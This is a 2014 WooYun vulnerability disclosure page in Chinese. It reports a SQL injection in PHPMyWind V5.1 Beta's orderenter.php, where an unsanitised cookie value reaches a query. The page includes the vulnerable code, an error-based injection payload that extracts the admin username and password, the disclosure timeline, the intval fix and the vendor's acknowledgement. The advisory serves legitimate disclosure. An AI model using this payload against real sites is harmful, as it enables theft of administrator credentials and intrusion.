当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078558

漏洞标题:PHPMyWind最新版SQL注入漏洞

相关厂商:phpmywind.com

漏洞作者: Apxar

提交时间:2014-10-09 22:41

修复时间:2014-11-23 22:42

公开时间:2014-11-23 22:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-10: 厂商已经确认,细节仅向厂商公开
2014-10-20: 细节向核心白帽子及相关领域专家公开
2014-10-30: 细节向普通白帽子公开
2014-11-09: 细节向实习白帽子公开
2014-11-23: 细节向公众公开

简要描述:

PHPMyWind 最新版V5.1 Beta 存在sql注入

详细说明:

文件:orderenter.php

//初始化参数
$action       = isset($action) ? $action : '';
$shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
$orderinfo    = unserialize(AuthCode($_COOKIE['orderinfo']));
$totalprice   = '';
$totalweight  = '';
//商品运费
$r = $dosql->GetOne("SELECT `postprice` FROM `#@__postmode` WHERE `id`=".$orderinfo['postmode']);
$postprice = $r['postprice'];


参数id 存在注入

漏洞证明:

构造的sql语句:
SELECT `postprice` FROM `pmw_postmode` WHERE `id`=2 or @`'` AND ( SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pmw_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b) or @`'`
图片:

1.jpg


修复方案:

Intval过滤

版权声明:转载请注明来源 Apxar@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-10 08:30

厂商回复:

漏洞收到 谢谢

最新状态:

暂无